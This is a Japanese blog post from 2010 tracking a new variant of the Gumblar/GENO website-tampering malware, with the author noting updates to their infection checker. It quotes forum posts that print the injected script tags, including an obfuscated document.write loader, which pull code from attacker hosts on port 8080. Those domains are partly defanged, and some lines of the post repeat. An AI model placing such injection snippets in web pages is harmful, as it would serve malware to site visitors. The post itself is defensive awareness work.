また改竄コードが変わった ― 2010/01/29 00:17
[WARNING] 8080 が攻撃手順を変更か? - UnderForge of Lackで伝えられている通り、改竄コードがまた変わりました。
検索に引っかかりにくい(絞り込みにくい)ので自力じゃ見つけられなかったです。
【Gumblar/GENO】Web改竄ウイルス総合スレ3【8080】- 2ch.net
難読化を解除すると
<script src=http://skyrock-com.domaintools.com.google-pl.superhighest●ru:8080/xinhuanet.com/xinhuanet.com/att.net/rbc.ru/google.com/></script>
やれやれです。
<追記>
えっと、Gumblarとガンブラー (Update)の感染チェック部分を手直ししました。
検索に引っかかりにくい(絞り込みにくい)ので自力じゃ見つけられなかったです。
【Gumblar/GENO】Web改竄ウイルス総合スレ3【8080】- 2ch.net
- 19 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2010/01/28(木) 21:31:37
<script src=http://skyrock-com.domaintools.com.google-pl.superhighest●ru:8080/xinhuanet.com/xinhuanet.com/att.net/rbc.ru/google.com/></script>
やれやれです。
<追記>
- 71 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2010/01/29(金) 11:54:57
>>68 DEBUGじゃない... ;document.write('<scr'+'ipt src=h'+'ttp://'+Xiabbjepv1.replace(/Widcfpac5ixzc/g, '8080')+'></scr'+'ipt>');} } catch(Xixc9uyr ) {} http://apopo●apparelarc-xml●org/z1z00712/
- 72 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2010/01/29(金) 13:09:27
- 73 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2010/01/29(金) 13:55:42
- あーmegaidもDEBUGもランダムになっちまったか…
*'``・* 。 | `*。 ,。∩ * + (´・ω・`) *。+゚ もうどうにでもな~れ `*。 ヽ、 つ *゚* `・+。*・' ゚⊃ +゚ ☆ ∪~ 。*゚</追記>
えっと、Gumblarとガンブラー (Update)の感染チェック部分を手直ししました。
最近のコメント